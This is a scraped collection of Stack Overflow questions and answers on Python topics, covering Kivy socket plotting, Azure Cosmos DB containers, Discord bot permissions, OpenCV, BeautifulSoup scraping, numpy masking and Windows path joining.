gy.flatten()[:len(self.bubbles)]\n\nbubble chart in a rectangle format\n"
] | [
0,
0,
0,
0
] | [] | [] | [
"bubble_chart",
"python",
"visualization"
] | stackoverflow_0070298696_bubble_chart_python_visualization.txt |
Q:
How to combine these two codes in Kivy?
I have two codes and I want to combine Python code into Kivy code.
python code:
import csv
import socket
import datetime
import time
from itertools import zip_longest
Time =[]
Price = []
fields = ['Time', 'Price']
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
port = 1
hostMACAddress = ''
s.bind((hostMACAddress,port))
s.listen(1)
client, address = s.accept()
while(1):
message_received = client.recv(1024).decode('utf-8')
data = message_received
Price.append(float(data))
Time.append(time.strftime("%a %I:%M:%S %p"))
item_1 = Time
item_2 = Price
data = [item_1, item_2]
export_data = zip_longest(*data, fillvalue = '')
with open('data1.csv', 'w', newline='') as file:
write = csv.writer(file)
write.writerow(("Time", "Price"))
write.writerows(export_data)
s.close()
kivy code:
from kivy.lang import Builder
from kivymd.app import MDApp
from kivy.uix.floatlayout import FloatLayout
from kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg
import matplotlib.pyplot as plt
import socket
import os
import numpy as np
import datetime
import matplotlib.animation as animation
from matplotlib import style
import csv
import pandas as pd
from matplotlib.animation import FuncAnimation
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
x_values = []
y_values = []
def animate(i):
data = pd.read_csv('data1.csv')
x_values = data['Time']
y_values = data['Price']
plt.cla()
plt.plot(x_values, y_values, color='green', linestyle='dashed', linewidth = 3, marker='o', markerfacecolor='blue', markersize=12)
plt.gcf().autofmt_xdate()
plt.tight_layout()
ani = FuncAnimation(plt.gcf(), animate, 5000)
plt.tight_layout()
class Matty(FloatLayout):
def __init__(self , **kwargs):
super(). __init__(**kwargs)
box = self.ids.box
box.add_widget(FigureCanvasKivyAgg(plt.gcf()))
def save_it(self):
pass
class MainApp(MDApp):
def build(self):
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "BlueGray"
Builder.load_file('matty.kv')
return Matty()
MainApp().run()
kv file:
<Matty>
BoxLayout:
id:box
size_hint_y: .75
pos_hint: {'x':0.0 , 'y':0.0}
I want to run the python code in the Kivy code to have a code. Every time I do this, the Kivy program does not respond. How can I get the data from the socket and save it to .csv file and then plot .csv data in kivy continuously.
A:
Since your first code has no classes or methods, it will run its loop forever as soon as it is imported by python.
You can still use that code by putting its import in a new thread. You can use something like:
def doit(self, button):
print('importing')
threading.Thread(target=self.do_import, daemon=True).start()
print('imported')
def do_import(self):
import python_code
where python_code is the name of the python file containing your python code (leave off the .py).
| How to combine these two codes in Kivy? | I have two codes and I want to combine Python code into Kivy code.
python code:
import csv
import socket
import datetime
import time
from itertools import zip_longest
Time =[]
Price = []
fields = ['Time', 'Price']
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
port = 1
hostMACAddress = ''
s.bind((hostMACAddress,port))
s.listen(1)
client, address = s.accept()
while(1):
message_received = client.recv(1024).decode('utf-8')
data = message_received
Price.append(float(data))
Time.append(time.strftime("%a %I:%M:%S %p"))
item_1 = Time
item_2 = Price
data = [item_1, item_2]
export_data = zip_longest(*data, fillvalue = '')
with open('data1.csv', 'w', newline='') as file:
write = csv.writer(file)
write.writerow(("Time", "Price"))
write.writerows(export_data)
s.close()
kivy code:
from kivy.lang import Builder
from kivymd.app import MDApp
from kivy.uix.floatlayout import FloatLayout
from kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg
import matplotlib.pyplot as plt
import socket
import os
import numpy as np
import datetime
import matplotlib.animation as animation
from matplotlib import style
import csv
import pandas as pd
from matplotlib.animation import FuncAnimation
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
x_values = []
y_values = []
def animate(i):
data = pd.read_csv('data1.csv')
x_values = data['Time']
y_values = data['Price']
plt.cla()
plt.plot(x_values, y_values, color='green', linestyle='dashed', linewidth = 3, marker='o', markerfacecolor='blue', markersize=12)
plt.gcf().autofmt_xdate()
plt.tight_layout()
ani = FuncAnimation(plt.gcf(), animate, 5000)
plt.tight_layout()
class Matty(FloatLayout):
def __init__(self , **kwargs):
super(). __init__(**kwargs)
box = self.ids.box
box.add_widget(FigureCanvasKivyAgg(plt.gcf()))
def save_it(self):
pass
class MainApp(MDApp):
def build(self):
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "BlueGray"
Builder.load_file('matty.kv')
return Matty()
MainApp().run()
kv file:
<Matty>
BoxLayout:
id:box
size_hint_y: .75
pos_hint: {'x':0.0 , 'y':0.0}
I want to run the python code in the Kivy code to have a code. Every time I do this, the Kivy program does not respond. How can I get the data from the socket and save it to .csv file and then plot .csv data in kivy continuously.
| [
"Since your first code has no classes or methods, it will run its loop forever as soon as it is imported by python.\nYou can still use that code by putting its import in a new thread. You can use something like:\ndef doit(self, button):\n print('importing')\n threading.Thread(target=self.do_import, daemon=True).start()\n print('imported')\n\ndef do_import(self):\n import python_code\n\nwhere python_code is the name of the python file containing your python code (leave off the .py).\n"
] | [
0
] | [] | [] | [
"kivy",
"matplotlib_widget",
"python",
"real_time"
] | stackoverflow_0074601897_kivy_matplotlib_widget_python_real_time.txt |
Q:
Python Program to create Container if not exist with partition key and unique Key
I want to write python script to create container only if it not exist with partition key and unique key.
Steps for Creating Alert Container
1. Create Container With Container ID: alerts
2. Add Partition Key as /user_tenant
3. Add Unique Key as /alert_id
reference link: https://github.com/Azure/azure-cosmos-python#create-a-container
plz suggest the api that will create container if it not present.
A:
@Gaurav Mantri
Below is the working code as suggested by you.
for uniqueKeys we need to add it inside uniqueKeyPolicy as shown in below code.
import azure.cosmos.documents as documents
from azure.cosmos import cosmos_client, http_constants, errors
import os
url = os.environ['COSMOS_DB_END_POINT']
key = os.environ['COSMOS_DB_MASTER_KEY']
database_name = os.environ["COSMOS_DB_DATABASE_ID"]
client = cosmos_client.CosmosClient(url, {'masterKey': key})
container_definition = {'id': 'alerts_test',
'partitionKey':
{
'paths': ['/user_tenant'],
'kind': documents.PartitionKind.Hash
},
'uniqueKeyPolicy': {
'uniqueKeys':
[
{'paths': ['/alert_id']}
]
}
}
try:
container = client.CreateContainer("dbs/" + database_name, container_definition, {'offerThroughput': 400})
print("New Container Created:")
print(container)
except errors.HTTPFailure as e:
if e.status_code == http_constants.StatusCodes.CONFLICT:
container = client.ReadContainer("dbs/" + database_name + "/colls/" + container_definition['id'])
print(container)
else:
raise e
A:
Here is my answer.
Create Connection
import azure.cosmos.cosmos_client as cosmos_client
COMOS_MASTER_KEY = "*****"
COMOS_ENDPOINT = "https://account.documents.azure.com:port/"
client = cosmos_client.CosmosClient(url=COMOS_ENDPOINT, credential={"masterKey":COMOS_MASTER_KEY})
Create Database If Not Exist
database = client.create_database_if_not_exists({'id': database_name,'offer_throughput':20000})
Create Collection If it does Not Exist
database.create_container_if_not_exists(id="collection_name",partition_key=PartitionKey(path="/partition_key_path"),offer_throughput=1000)
| Python Program to create Container if not exist with partition key and unique Key | I want to write python script to create container only if it not exist with partition key and unique key.
Steps for Creating Alert Container
1. Create Container With Container ID: alerts
2. Add Partition Key as /user_tenant
3. Add Unique Key as /alert_id
reference link: https://github.com/Azure/azure-cosmos-python#create-a-container
plz suggest the api that will create container if it not present.
| [
"@Gaurav Mantri\nBelow is the working code as suggested by you.\nfor uniqueKeys we need to add it inside uniqueKeyPolicy as shown in below code.\nimport azure.cosmos.documents as documents\nfrom azure.cosmos import cosmos_client, http_constants, errors\nimport os\n\nurl = os.environ['COSMOS_DB_END_POINT']\nkey = os.environ['COSMOS_DB_MASTER_KEY']\ndatabase_name = os.environ[\"COSMOS_DB_DATABASE_ID\"]\nclient = cosmos_client.CosmosClient(url, {'masterKey': key})\n\ncontainer_definition = {'id': 'alerts_test',\n 'partitionKey':\n {\n 'paths': ['/user_tenant'],\n 'kind': documents.PartitionKind.Hash\n },\n 'uniqueKeyPolicy': {\n 'uniqueKeys':\n [\n {'paths': ['/alert_id']}\n ]\n }\n }\n\ntry:\n container = client.CreateContainer(\"dbs/\" + database_name, container_definition, {'offerThroughput': 400})\n print(\"New Container Created:\")\n print(container)\nexcept errors.HTTPFailure as e:\n if e.status_code == http_constants.StatusCodes.CONFLICT:\n container = client.ReadContainer(\"dbs/\" + database_name + \"/colls/\" + container_definition['id'])\n print(container)\n else:\n raise e\n\n",
"Here is my answer.\nCreate Connection\nimport azure.cosmos.cosmos_client as cosmos_client\n\nCOMOS_MASTER_KEY = \"*****\" \nCOMOS_ENDPOINT = \"https://account.documents.azure.com:port/\" \n\nclient = cosmos_client.CosmosClient(url=COMOS_ENDPOINT, credential={\"masterKey\":COMOS_MASTER_KEY})\n\nCreate Database If Not Exist\ndatabase = client.create_database_if_not_exists({'id': database_name,'offer_throughput':20000})\n\nCreate Collection If it does Not Exist\ndatabase.create_container_if_not_exists(id=\"collection_name\",partition_key=PartitionKey(path=\"/partition_key_path\"),offer_throughput=1000)\n\n"
] | [
0,
0
] | [] | [] | [
"azure_cosmosdb",
"python"
] | stackoverflow_0060772092_azure_cosmosdb_python.txt |
Q:
How to make a ckeck of user permissions in disnake or discord.py
I've got a code with permissions. I need to check a member permissions and if member don`t have such permissions send a message
Main code:
@commands.slash_command(name = "addrole", description="Додати користувачу роль")
@commands.has_permissions(view_audit_log=True)
async def addrole(self, ctx, member: disnake.Member, role: disnake.Role):
#try:
await member.add_roles(role)
emb = disnake.Embed(title=f"Видача ролі", description=f"Користувачу {member.mention} було видано роль {role.mention} на сервері {ctx.guild.name}\n Видав модератор - **{ctx.author.mention}**", colour=disnake.Color.blue(), timestamp=ctx.created_at)
await ctx.send(embed=emb)
What i want to have:
@commands.slash_command(name = "addrole", description="Додати користувачу роль")
@commands.has_permissions(view_audit_log=True)
async def addrole(self, ctx, member: disnake.Member, role: disnake.Role):
if ctx.author.guild_permissions.view_audit_log:
await member.add_roles(role)
emb = disnake.Embed(title=f"Видача ролі", description=f"Користувачу {member.mention} було видано роль {role.mention} на сервері {ctx.guild.name}\n Видав модератор - **{ctx.author.mention}**", colour=disnake.Color.blue(), timestamp=ctx.created_at)
await ctx.send(embed=emb)
else:
await ctx.send("You don`t have such permissions!")
Please, help me. I tried diferrent variants and no one working
A:
I think you are not getting what you want because you are trying to integrate both at once. From what I can see from your description and code, the easiest solution I could provide you is removing @commands.has_permissions(view_audit_log=True) from your "what I want to have" section of code. However, if you don't want to have to add an extra if and else statement sending "you dont have permissions" to the user under every command, I would suggest creating an error handler. Using this method, you would be able to use the first block of code you have listed in your question. Here is a very basic sample of the one I use which deals with a user not having permissions to use a certain command. You'll probably need to change it to fit your specific bot but it's a start:
@client.event
async def on_command_error(ctx, error)
await ctx.send(error) # this sends the error where the user is attempting to use a command. This means if the user is missing the right permissions to use a command, it will send something like "missing permissions" to the user. Which I think is what you are looking for
The "what I want to have" code is not working because the code you have under it is unreachable unless the user has the audit_log permissions. And if they already have those permissions, the if and else statements checking permissions are not very useful. An error handler is in my opinion good to have and has helped me a ton with my bots. Hope this helps
| How to make a ckeck of user permissions in disnake or discord.py | I've got a code with permissions. I need to check a member permissions and if member don`t have such permissions send a message
Main code:
@commands.slash_command(name = "addrole", description="Додати користувачу роль")
@commands.has_permissions(view_audit_log=True)
async def addrole(self, ctx, member: disnake.Member, role: disnake.Role):
#try:
await member.add_roles(role)
emb = disnake.Embed(title=f"Видача ролі", description=f"Користувачу {member.mention} було видано роль {role.mention} на сервері {ctx.guild.name}\n Видав модератор - **{ctx.author.mention}**", colour=disnake.Color.blue(), timestamp=ctx.created_at)
await ctx.send(embed=emb)
What i want to have:
@commands.slash_command(name = "addrole", description="Додати користувачу роль")
@commands.has_permissions(view_audit_log=True)
async def addrole(self, ctx, member: disnake.Member, role: disnake.Role):
if ctx.author.guild_permissions.view_audit_log:
await member.add_roles(role)
emb = disnake.Embed(title=f"Видача ролі", description=f"Користувачу {member.mention} було видано роль {role.mention} на сервері {ctx.guild.name}\n Видав модератор - **{ctx.author.mention}**", colour=disnake.Color.blue(), timestamp=ctx.created_at)
await ctx.send(embed=emb)
else:
await ctx.send("You don`t have such permissions!")
Please, help me. I tried diferrent variants and no one working
| [
"I think you are not getting what you want because you are trying to integrate both at once. From what I can see from your description and code, the easiest solution I could provide you is removing @commands.has_permissions(view_audit_log=True) from your \"what I want to have\" section of code. However, if you don't want to have to add an extra if and else statement sending \"you dont have permissions\" to the user under every command, I would suggest creating an error handler. Using this method, you would be able to use the first block of code you have listed in your question. Here is a very basic sample of the one I use which deals with a user not having permissions to use a certain command. You'll probably need to change it to fit your specific bot but it's a start:\[email protected]\nasync def on_command_error(ctx, error)\n await ctx.send(error) # this sends the error where the user is attempting to use a command. This means if the user is missing the right permissions to use a command, it will send something like \"missing permissions\" to the user. Which I think is what you are looking for\n\n\nThe \"what I want to have\" code is not working because the code you have under it is unreachable unless the user has the audit_log permissions. And if they already have those permissions, the if and else statements checking permissions are not very useful. An error handler is in my opinion good to have and has helped me a ton with my bots. Hope this helps\n"
] | [
0
] | [] | [] | [
"discord",
"discord.py",
"disnake",
"python"
] | stackoverflow_0074589128_discord_discord.py_disnake_python.txt |
Q:
Python how to read cropped Word with CV2 and convert to gray?
I'm trying to make letter segmentation and I'm using WordDetector to crop words as this code
def contours_words(image_file):
im3 = image_file.copy()
img = prepare_img(image_file, 50)
detections = detect(img,
kernel_size=25,
sigma=3,
theta=8,
min_area=100)
line = sort_line(detections)[0]
for i, word in enumerate(line):
if word.bbox.h > 19 and word.bbox.w >= 22 and word.bbox.w <= 250:
contours_letters(word.img)
I got an array cropped Image so I need to read it with OpenCV to convert it to grayscale and
use it to make find contour like that
gray = cv2.cvtColor(image_file, cv2.COLOR_BGR2GRAY)
ret, thresh1 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV)
dilated = cv2.dilate(thresh1, None, iterations=1)
cnts = cv2.findContours(
dilated.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
cnts = sort_contours(cnts, method="left-to-right")[0]
when I try to read the array image with
image = cv2.imread(image_file)
I got an error and I don't need to save the image and re-read it again to not save images at the client thanks all
A:
I found the answer I need to convert it to RGB color image then I convert it to gray scale
opencvImage = cv2.cvtColor(np.array(image_file), cv2.COLOR_RGB2BGR)
gray = cv2.cvtColor(opencvImage, cv2.COLOR_BGR2GRAY)
| Python how to read cropped Word with CV2 and convert to gray? | I'm trying to make letter segmentation and I'm using WordDetector to crop words as this code
def contours_words(image_file):
im3 = image_file.copy()
img = prepare_img(image_file, 50)
detections = detect(img,
kernel_size=25,
sigma=3,
theta=8,
min_area=100)
line = sort_line(detections)[0]
for i, word in enumerate(line):
if word.bbox.h > 19 and word.bbox.w >= 22 and word.bbox.w <= 250:
contours_letters(word.img)
I got an array cropped Image so I need to read it with OpenCV to convert it to grayscale and
use it to make find contour like that
gray = cv2.cvtColor(image_file, cv2.COLOR_BGR2GRAY)
ret, thresh1 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV)
dilated = cv2.dilate(thresh1, None, iterations=1)
cnts = cv2.findContours(
dilated.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
cnts = sort_contours(cnts, method="left-to-right")[0]
when I try to read the array image with
image = cv2.imread(image_file)
I got an error and I don't need to save the image and re-read it again to not save images at the client thanks all
| [
"I found the answer I need to convert it to RGB color image then I convert it to gray scale\nopencvImage = cv2.cvtColor(np.array(image_file), cv2.COLOR_RGB2BGR)\ngray = cv2.cvtColor(opencvImage, cv2.COLOR_BGR2GRAY)\n\n"
] | [
0
] | [] | [] | [
"computer_vision",
"opencv",
"python"
] | stackoverflow_0074602640_computer_vision_opencv_python.txt |
Q:
How to remove lines that does not end with numbers?
I have a text file Mytext.txt that looks like this,
0 1 A
1 2 T
2 3 A
3 4 B
4 5 A
5 6
6 7 A
7 8 D
8 9 C
9 10
10 11 M
11 12 Z
12 13 H
What is the easiest way in python with which I can remove the lines that do not end with a letter? So the above becomes
0 1 A
1 2 T
2 3 A
3 4 B
4 5 A
6 7 A
7 8 D
8 9 C
10 11 M
11 12 Z
12 13 H
A:
with open('Mytext.txt', 'r') as fin:
with open('Newtext.txt', 'w') as fout:
for line in fin:
if line.rstrip()[-1].isalpha()
fout.write(line)
| How to remove lines that does not end with numbers? | I have a text file Mytext.txt that looks like this,
0 1 A
1 2 T
2 3 A
3 4 B
4 5 A
5 6
6 7 A
7 8 D
8 9 C
9 10
10 11 M
11 12 Z
12 13 H
What is the easiest way in python with which I can remove the lines that do not end with a letter? So the above becomes
0 1 A
1 2 T
2 3 A
3 4 B
4 5 A
6 7 A
7 8 D
8 9 C
10 11 M
11 12 Z
12 13 H
| [
"with open('Mytext.txt', 'r') as fin:\n with open('Newtext.txt', 'w') as fout:\n for line in fin:\n if line.rstrip()[-1].isalpha()\n fout.write(line)\n\n"
] | [
1
] | [] | [] | [
"python",
"text"
] | stackoverflow_0074602920_python_text.txt |
Q:
Web scraping doesn't iterate over entire webpage
Im trying to scrape the information of all the player names and player rating from this website:
https://www.fifaindex.com/players/?gender=0&league=1&order=desc
But i only get the information from the first player on the page.
The code im using:
from bs4 import BeautifulSoup
import requests
url = "https://www.fifaindex.com/players/?gender=0&league=1&order=desc"
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
results = soup.find_all('div', class_="responsive-table table-rounded")
for result in results:
rating = result.find("span", class_="badge badge-dark rating r3").text
name = result.find("a", class_="link-player")
info = [rating, name]
print(info)
The HTML parsed is attached in the picture
A:
I tinkered around a little bit and I think I got a version that does what you want
from bs4 import BeautifulSoup
import requests
page = requests.get("https://www.fifaindex.com/players/?
gender=0&league=1&order=desc")
soup = BeautifulSoup(page.content, "html.parser")
results = soup.find_all("tr")
for result in results:
try:
result["data-playerid"]
except KeyError:
continue
rating = result.find("span", class_="badge badge-dark rating r3").text
name = result.find("a", class_="link-player")
info = [rating, name]
print(info)
A:
Get all table lines with a data-playerid attribute will fix it:
#!/usr/bin/env python3
from bs4 import BeautifulSoup
import requests
url = "https://www.fifaindex.com/players/?gender=0&league=1&order=desc"
r = requests.get(url)
soup = BeautifulSoup(r.content, 'html.parser')
results = soup.find_all('tr', {'data-playerid': True})
for res in results:
rating = res.find("span", class_="badge badge-dark rating r3").text
name = res.find("a", class_="link-player")
info = [rating, name]
print(info)
| Web scraping doesn't iterate over entire webpage | Im trying to scrape the information of all the player names and player rating from this website:
https://www.fifaindex.com/players/?gender=0&league=1&order=desc
But i only get the information from the first player on the page.
The code im using:
from bs4 import BeautifulSoup
import requests
url = "https://www.fifaindex.com/players/?gender=0&league=1&order=desc"
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
results = soup.find_all('div', class_="responsive-table table-rounded")
for result in results:
rating = result.find("span", class_="badge badge-dark rating r3").text
name = result.find("a", class_="link-player")
info = [rating, name]
print(info)
The HTML parsed is attached in the picture
| [
"I tinkered around a little bit and I think I got a version that does what you want\nfrom bs4 import BeautifulSoup\nimport requests\n\npage = requests.get(\"https://www.fifaindex.com/players/? \ngender=0&league=1&order=desc\")\nsoup = BeautifulSoup(page.content, \"html.parser\")\nresults = soup.find_all(\"tr\")\n\nfor result in results:\n try:\n result[\"data-playerid\"]\n except KeyError:\n continue\n\n rating = result.find(\"span\", class_=\"badge badge-dark rating r3\").text\n name = result.find(\"a\", class_=\"link-player\")\n info = [rating, name]\n print(info)\n\n",
"Get all table lines with a data-playerid attribute will fix it:\n#!/usr/bin/env python3\nfrom bs4 import BeautifulSoup\nimport requests\nurl = \"https://www.fifaindex.com/players/?gender=0&league=1&order=desc\"\nr = requests.get(url)\n\nsoup = BeautifulSoup(r.content, 'html.parser')\n\nresults = soup.find_all('tr', {'data-playerid': True})\n\nfor res in results:\n rating = res.find(\"span\", class_=\"badge badge-dark rating r3\").text\n name = res.find(\"a\", class_=\"link-player\")\n info = [rating, name]\n print(info)\n\n"
] | [
0,
0
] | [] | [] | [
"beautifulsoup",
"python",
"web_scraping"
] | stackoverflow_0074602709_beautifulsoup_python_web_scraping.txt |
Q:
How to improve partial 2D array filling/filtering in numpy
I'm currently reading reviewing code. I have a double loop to filter a 2D array according to a 1D array.
Here is the code:
import numpy as np
size_a = 500
size_b = 2000
a = np.random.rand(size_a)
c = np.random.rand(size_a*size_b).reshape((size_a, size_b))
d = np.random.rand(size_b)
# double loop for filtering c according to d
for i in range(size_b):
for j in range(size_a):
if a[j] <= d[i]:
c[j,i] = 0
# first improvement
for i in range(size_b):
c[a <= d[i], i] = 0
Can we do better ? In terms of speed of execution.
A:
Let's describe what you want to do in words:
You have a matrix c of shape (size_a, size_b).
You have a vector a with one element per row of c
You have a vector d with one element per column of c
In those locations where a[i] <= d[j], you want to set c to zero.
Let's say we have:
size_a = 3
size_b = 5
a = np.array([23, 55, 37])
c = np.array([[56, 37, 50, 49, 57],
[81, 50, 98, 11, 9],
[52, 47, 23, 64, 20]])
d = np.array([27, 16, 74, 95, 8])
I obtained these using np.random.randint(0, 100, shape) for each of the arrays, but I've hardcoded them here for ease of reproduction and understanding
You can compare the vectors a and d at every combination of i and j two ways:
Cast them into matrices of the same size:
a_cast = np.tile(a, (size_b, 1)).T
# array([[23, 23, 23, 23, 23],
# [55, 55, 55, 55, 55],
# [37, 37, 37, 37, 37]])
d_cast = np.tile(d, (size_a, 1))
# array([[27, 16, 74, 95, 8],
# [27, 16, 74, 95, 8],
# [27, 16, 74, 95, 8]])
mask = a_cast <= d_cast
# array([[ True, False, True, True, False],
# [False, False, True, True, False],
# [False, False, True, True, False]])
c[mask] = 0
Have numpy do the broadcasting for you, by making a a (size_a, 1) matrix and d a (1, size_b) matrix. This is done by taking a slice of each vector, with an extra None axis, which creates an extra axis of length 1 (see In numpy, what does selection by [:,None] do?):
mask = a[:, None] <= d[None, :]
# a[:, None] gives:
# array([[23],
# [55],
# [37]])
# d[None, :] gives:
# array([[27, 16, 74, 95, 8]])
c[mask] = 0
Both these methods result in the same c:
array([[ 0, 37, 0, 0, 57],
[81, 50, 0, 0, 9],
[52, 47, 0, 0, 20]])
| How to improve partial 2D array filling/filtering in numpy | I'm currently reading reviewing code. I have a double loop to filter a 2D array according to a 1D array.
Here is the code:
import numpy as np
size_a = 500
size_b = 2000
a = np.random.rand(size_a)
c = np.random.rand(size_a*size_b).reshape((size_a, size_b))
d = np.random.rand(size_b)
# double loop for filtering c according to d
for i in range(size_b):
for j in range(size_a):
if a[j] <= d[i]:
c[j,i] = 0
# first improvement
for i in range(size_b):
c[a <= d[i], i] = 0
Can we do better ? In terms of speed of execution.
| [
"Let's describe what you want to do in words:\n\nYou have a matrix c of shape (size_a, size_b).\nYou have a vector a with one element per row of c\nYou have a vector d with one element per column of c\n\nIn those locations where a[i] <= d[j], you want to set c to zero.\nLet's say we have:\nsize_a = 3\nsize_b = 5\n\na = np.array([23, 55, 37])\nc = np.array([[56, 37, 50, 49, 57],\n [81, 50, 98, 11, 9],\n [52, 47, 23, 64, 20]])\n\nd = np.array([27, 16, 74, 95, 8])\n\nI obtained these using np.random.randint(0, 100, shape) for each of the arrays, but I've hardcoded them here for ease of reproduction and understanding\nYou can compare the vectors a and d at every combination of i and j two ways:\n\nCast them into matrices of the same size:\n\na_cast = np.tile(a, (size_b, 1)).T\n# array([[23, 23, 23, 23, 23],\n# [55, 55, 55, 55, 55],\n# [37, 37, 37, 37, 37]])\n\nd_cast = np.tile(d, (size_a, 1))\n# array([[27, 16, 74, 95, 8],\n# [27, 16, 74, 95, 8],\n# [27, 16, 74, 95, 8]])\n\nmask = a_cast <= d_cast\n# array([[ True, False, True, True, False],\n# [False, False, True, True, False],\n# [False, False, True, True, False]])\n\nc[mask] = 0\n\n\nHave numpy do the broadcasting for you, by making a a (size_a, 1) matrix and d a (1, size_b) matrix. This is done by taking a slice of each vector, with an extra None axis, which creates an extra axis of length 1 (see In numpy, what does selection by [:,None] do?):\n\nmask = a[:, None] <= d[None, :]\n\n# a[:, None] gives:\n# array([[23],\n# [55],\n# [37]])\n\n# d[None, :] gives:\n# array([[27, 16, 74, 95, 8]])\n\n\nc[mask] = 0\n\nBoth these methods result in the same c:\narray([[ 0, 37, 0, 0, 57],\n [81, 50, 0, 0, 9],\n [52, 47, 0, 0, 20]])\n\n"
] | [
1
] | [] | [] | [
"numpy",
"python"
] | stackoverflow_0074602767_numpy_python.txt |
Q:
Concatenate path and filename
I have to build the full path together in python. I tried this:
filename= "myfile.odt"
subprocess.call(['C:\Program Files (x86)\LibreOffice 5\program\soffice.exe',
'--headless',
'--convert-to',
'pdf', '--outdir',
r'C:\Users\A\Desktop\Repo\',
r'C:\Users\A\Desktop\Repo\'+filename])
But I get this error
SyntaxError: EOL while scanning string literal.
A:
Try:
import os
os.path.join('C:\Users\A\Desktop\Repo', filename)
The os module contains many useful methods for directory and path manipulation
A:
Backslash character (\) has to be escaped in string literals.
This is wrong: '\'
This is correct: '\\' - this is a string containing one backslash
Therefore, this is wrong:
'C:\Program Files (x86)\LibreOffice 5\program\soffice.exe'
There is a trick!
String literals prefixed by r are meant for easier writing of regular expressions. One of their features is that backslash characters do not have to be escaped. So, this would be OK:
r'C:\Program Files (x86)\LibreOffice 5\program\soffice.exe'
However, that wont work for a string ending in backslash:
r'\' - this is a syntax error
So, this is also wrong:
r'C:\Users\A\Desktop\Repo\'
So, I would do the following:
import os
import subprocess
soffice = 'C:\\Program Files (x86)\\LibreOffice 5\\program\\soffice.exe'
outdir = 'C:\\Users\\A\\Desktop\\Repo\\'
full_path = os.path.join(outdir, filename)
subprocess.call([soffice,
'--headless',
'--convert-to', 'pdf',
'--outdir', outdir,
full_path])
A:
The problem you have is that your raw string is ending with a single backslash. For reason I don't understand, this is not allowed. You can either double up the slash at the end:
r'C:\Users\A\Desktop\Repo\\'+filename
or use os.path.join(), which is the preferred method:
os.path.join(r'C:\Users\A\Desktop\Repo', filename)
A:
To build on what zanseb said, use the os.path.join, but also \ is an escape character, so your string literal can't end with a \ as it would escape the ending quote.
import os
os.path.join(r'C:\Users\A\Desktop\Repo', filename)
A:
To anyone else stumbling across this question, you can use \ to concatenate a Path object and str.
Use path.Path for paths compatible with both Unix and Windows (you can use it the same way as I've used pathlib.PureWindowsPath).
The only reason I'm using pathlib.PureWindowsPath is that the question asked specifically about Windows paths.
For example:
import pathlib
# PureWindowsPath enforces Windows path style
# for paths that work on both Unix and Windows use path.Path
base_dir = pathlib.PureWindowsPath(r'C:\Program Files (x86)\LibreOffice 5\program')
# elegant path concatenation
myfile = base_dir / "myfile.odt"
print(myfile)
>>> C:\Program Files (x86)\LibreOffice 5\program\myfile.odt
A:
add library to code :
from pathlib import Path
when u want get current path without filename use this method :
print("Directory Path:", Path().absolute())
now you just need to add the file name to it :for example
mylink = str(Path().absolute())+"/"+"filename.etc" #str(Path().absolute())+"/"+"hello.txt"
If normally addes to the first path "r" character
for example: r"c://..."
You do not need to do here
A:
You can also simply add the strings together. Personally I like this more.
filename = r"{}{}{}".format(dir, foldername, filename)
| Concatenate path and filename | I have to build the full path together in python. I tried this:
filename= "myfile.odt"
subprocess.call(['C:\Program Files (x86)\LibreOffice 5\program\soffice.exe',
'--headless',
'--convert-to',
'pdf', '--outdir',
r'C:\Users\A\Desktop\Repo\',
r'C:\Users\A\Desktop\Repo\'+filename])
But I get this error
SyntaxError: EOL while scanning string literal.
| [
"Try:\nimport os\nos.path.join('C:\\Users\\A\\Desktop\\Repo', filename)\n\nThe os module contains many useful methods for directory and path manipulation\n",
"Backslash character (\\) has to be escaped in string literals.\n\nThis is wrong: '\\'\nThis is correct: '\\\\' - this is a string containing one backslash\n\nTherefore, this is wrong:\n'C:\\Program Files (x86)\\LibreOffice 5\\program\\soffice.exe'\n\nThere is a trick!\nString literals prefixed by r are meant for easier writing of regular expressions. One of their features is that backslash characters do not have to be escaped. So, this would be OK:\nr'C:\\Program Files (x86)\\LibreOffice 5\\program\\soffice.exe'\n\nHowever, that wont work for a string ending in backslash:\n\nr'\\' - this is a syntax error\n\nSo, this is also wrong:\nr'C:\\Users\\A\\Desktop\\Repo\\'\n\nSo, I would do the following:\nimport os\nimport subprocess\n\n\nsoffice = 'C:\\\\Program Files (x86)\\\\LibreOffice 5\\\\program\\\\soffice.exe'\noutdir = 'C:\\\\Users\\\\A\\\\Desktop\\\\Repo\\\\'\nfull_path = os.path.join(outdir, filename)\n\nsubprocess.call([soffice,\n '--headless',\n '--convert-to', 'pdf',\n '--outdir', outdir,\n full_path])\n\n",
"The problem you have is that your raw string is ending with a single backslash. For reason I don't understand, this is not allowed. You can either double up the slash at the end:\nr'C:\\Users\\A\\Desktop\\Repo\\\\'+filename\n\nor use os.path.join(), which is the preferred method:\nos.path.join(r'C:\\Users\\A\\Desktop\\Repo', filename)\n\n",
"To build on what zanseb said, use the os.path.join, but also \\ is an escape character, so your string literal can't end with a \\ as it would escape the ending quote.\nimport os\nos.path.join(r'C:\\Users\\A\\Desktop\\Repo', filename)\n\n",
"To anyone else stumbling across this question, you can use \\ to concatenate a Path object and str.\nUse path.Path for paths compatible with both Unix and Windows (you can use it the same way as I've used pathlib.PureWindowsPath).\nThe only reason I'm using pathlib.PureWindowsPath is that the question asked specifically about Windows paths.\nFor example:\nimport pathlib\n# PureWindowsPath enforces Windows path style\n# for paths that work on both Unix and Windows use path.Path\nbase_dir = pathlib.PureWindowsPath(r'C:\\Program Files (x86)\\LibreOffice 5\\program')\n# elegant path concatenation\nmyfile = base_dir / \"myfile.odt\"\n\nprint(myfile)\n>>> C:\\Program Files (x86)\\LibreOffice 5\\program\\myfile.odt\n\n",
